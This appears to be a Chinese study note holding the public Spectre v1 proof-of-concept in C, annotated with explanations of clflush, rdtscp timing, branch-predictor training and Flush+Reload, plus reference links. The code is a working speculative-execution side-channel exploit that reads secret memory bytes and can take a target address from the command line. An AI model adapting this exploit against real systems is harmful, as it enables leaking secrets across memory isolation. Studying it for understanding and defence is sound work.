spectre 记录
公西光华
v1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush GCC 内置函数集(针对 x86 平台) */
#endif
#include<thread>
#include<time.h>
/*
参考博客
[非易失内存编程] 通过编译器内置函数 (Intrinsic Functions) 发射 CLFLUSH、CLFLUSHOPT
https://blog.csdn.net/maokelong95/article/details/81362837
Spectre 攻击详解 https://zhuanlan.zhihu.com/p/33635193
https://meltdownattack.com/
Flush-Reload 方式完成 Side-channel attack https://zhuanlan.zhihu.com/p/32848483
解读 Meltdown & Spectre CPU 漏洞 https://zhuanlan.zhihu.com/p/32757727
*/
/********************************************************************
Victim code.
********************************************************************/
// 数组1大小 16
// unsigned int array1_size = 16;
// const unsigned int array1_size = 16;
volatile const unsigned int array1_size = 16;
// volatile unsigned int array1_size = 16;
#define BIT 4096
// typedef unsigned char unint8
uint8_t unused1[64];
/***
* array1代表了受害者和攻击者之间的共享内存空间,但这只是一个例子:它的另一种代码大小可以正常工作
* array1被两个未使用的数组包围:这些数组对于确保命中不同的缓存路径是很有用的。在许多处理器L1缓存每一路径有64个字节
*/
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t unused2[64];
uint8_t array2[256 * BIT];
// 假设攻击者想要恢复的数据
char *secret = "The Magic Words are Squeamish Ossifrage.";
uint8_t temp = 0; /* To not optimize out victim_function() */
/*
1. 读取array1_size。这一操作会导致缓存丢失。
2. 尽管处理器正抓取array1_size——由于存在缓存缺失,array1_size是“长”的——但是分支预测器假设它是正确的(不正确的猜测)。
3. 推测读取array1[x]。该读取非常快速,因为它是缓存命中。
4. 读取array2[array1[x]* BIT]。读取时间很长(缓存缺失)。
5. 虽然步骤4中的读取正在等待,但是步骤1的值已经到达。处理器检测到其猜测不正确,并重新调整了自身状态。
*/
void victim_function(size_t x){
if (x < array1_size){
temp &= array2[array1[x] * BIT];
// array2[array1[x] * BIT] + 1;
// array2[array1[x] * BIT] ++ ; // 自增是可以的 a = a+1 ; a++ ;
// uint8_t temp1 = array2[array1[x] * BIT];
// array2[array1[x] * BIT]; uint8_t ccc = 1 ; 无效
// size_t inx = array1[x] * BIT; uint8_t temp3 = array2[inx] ; // 有效
// size_t inx = array1[x] * BIT; uint8_t temp3 = array2[array1[x]] ; // 无效
}
}
/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* cache hit if time <= threshold阈值 */
/*
Report best guess in value[0] and runner-up in value[1]
该函数将尝试猜测位于给定地址的值。对于所有可能的字节值(有256个),该函数将测试使用Flush+Reload缓存攻击访问该值所需的时间。
各种时序存储在results表中,但是函数只返回了两个最佳猜测
*/
void readMemoryByte(size_t malicious_x, uint8_t value[2],int score[2]){
static int results[256];
int tries, i, j, k, mix_i;
unsigned int junk = 0;
size_t training_x, x; // typedef unsigned long long size_t
register uint64_t time1, time2;
volatile uint8_t *addr;
for (i = 0; i < 256; i++) results[i] = 0;
for (tries = 999; tries > 0; tries--){
/* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++) {
/*GCC 内置的 clflush
CLFLUSH(Cache Line Flush,缓存行刷回)能够把指定缓存行(Cache Line)从所有级缓存中淘汰,若该缓存行中的数据被修改过,则将该数据写入主存;
支持现状:目前主流处理器均支持该指令
void _mm_clflush (void const* p) 从缓存层次结构的所有级别中使包含 p 的缓存行无效并刷新
首先,从一个纯净的状态开始,删除了整个array2表。该表是与攻击者共享的,它需要能够存储256个不同的缓存线路。而缓存线路的大小是BIT位
*/
_mm_clflush(&array2[i * BIT]);
}
/* 5 trainings (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--){
_mm_clflush((const int *) &array1_size);
/*volatile:
A volatile specifier is a hint to a compiler that an object may change its value in ways not specified by the language so that aggressive optimizations must be avoided
通常用于建立语言级别的 memory barrier
编译器对访问该变量的代码就不再进行优化,从而可以提供对特殊地址的稳定访问,系统总是重新从它所在的内存读取数据,即使它前面的指令刚刚从该处读取过数据。而且读取的数据立刻被保存
用来确保刷新完成的,处理器不会重新排序
*/
for (volatile int z = 0; z < 100; z++){}
/* Delay (can also mfence) */
x = ((j % 6) - 1) & ~ 0xFFFF;/* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x)); // training_x < 0x000F
// 上面三行等价于
// x = j%6?training_x:malicious_x;
// for(int xx = 0 ; xx < 100; xx++ ) ; //使用一定的for循环可以减少 上面j%6? 的 分支判断影响,可能是加强预测正确的判断
// printf("j=%d training_x = %d, x = %d \n", j, training_x,x);
victim_function(x); /* Call the victim! */
}
/* Time reads. Mixed-up order to prevent stride prediction 防止步幅预测的混合顺序 */
for (i = 0; i < 256; i++){
mix_i = ((i * 167) + 13) & 255; // 计算缓存线路的地址来进行检查
addr = &array2[mix_i * BIT];
/*
unsigned __int64 __rdtscp (unsigned int * mem_addr)
Copy the current 64-bit value of the processor's time-stamp counter into dst, and store the IA32_TSC_AUX MSR (signature value) into memory at mem_addr.
将处理器时间戳计数器的当前 64 位值复制到 dst 中,并将 IA32_TSC_AUX MSR(签名值)存储到内存中的 mem_addr
*/
time1 = __rdtscp(&junk);
junk = *addr; /* Time memory access */
time2 = __rdtscp(&junk) - time1; /* Compute elapsed time */
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) results[mix_i]++; /* cache hit -> score +1 for this value */
}
/* Locate highest j & second-highest k results */
j = k = results[0];
for (i = 1; i < 256; i++){
if (results[i] >= results[j]){
k = j;
j = i;
} else if (results[i] >= results[k]){
k = i;
}
}
if (results[j] >= (2 * results[k] + 5) ||(results[j] == 2 && results[k] == 0))
break; /* Success if best is > 2*runner-up + 5 or 2/0) */
}
/* use junk to prevent code from being optimized out 使用junk来防止代码被优化掉*/
// results[0] ^= junk;
value[0] = (uint8_t)j;
score[0] = results[j];
value[1] = (uint8_t)k;
score[1] = results[k];
}
/** printf 格式化参数
* X:Unsigned hexadecimal integer (uppercase)
* p: Pointer address
*/
/**
* void* 一个通用指针,可以指向任意类型的指针
* 指针有两个属性:指向变量/对象的地址和长度,但是指针指存储被指向变量的地址,长度则取决于指针的类型
*
* argc = argument count :表示传入main函数的数组元素个数
* argv = argument vector :表示传入main函数的指针数组,为char**类型,
* 第一个数组元素argv[0]是程序名称,并且包含程序所在的完整路径。argc至少为1,即argv数组至少包含程序名
* 一般编译器默认使用argc和argv两个名称作为main函数的参数,但这两个参数如此命名并不是必须的
*/
int main(int argc, const char **argv) {
size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
printf("secret address = %p,array1 address = %p, minus malicious_x= %p\n", (void *)secret,(void *)array1, (void *)malicious_x);
int i, score[2], len = 40;
uint8_t value[2];
for (i = 0; i < sizeof(array2); i++)
array2[i] = 1; /* write to array2 to ensure it is memory backed 支持 */
if (argc == 3){
sscanf(argv[1], "%p", (void **)(&malicious_x));
malicious_x -= (size_t)array1; /* Input value to pointer */
sscanf(argv[2], "%d", &len);
printf("Trying malicious_x = %p, len = %dn", (void *)malicious_x, len);
}
printf("Reading %d bytes:\n", len);
clock_t start = clock();
while (--len >= 0){
// std::this_thread::sleep_for(std::chrono::milliseconds(1000));
readMemoryByte(malicious_x++, value, score);
printf("Reading at malicious_x = %p... ", (void *)malicious_x);
printf("%s: ", score[0] >= 2 * score[1] ? "Success" : "Unclear");
// 不是显示字符输出 ?
printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
if (score[1] > 0)
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n");
}
clock_t end = clock();
// printf("%.6f \n",(end-start + 0.0)/CLOCKS_PER_SEC);
return (0);
}
类似资料: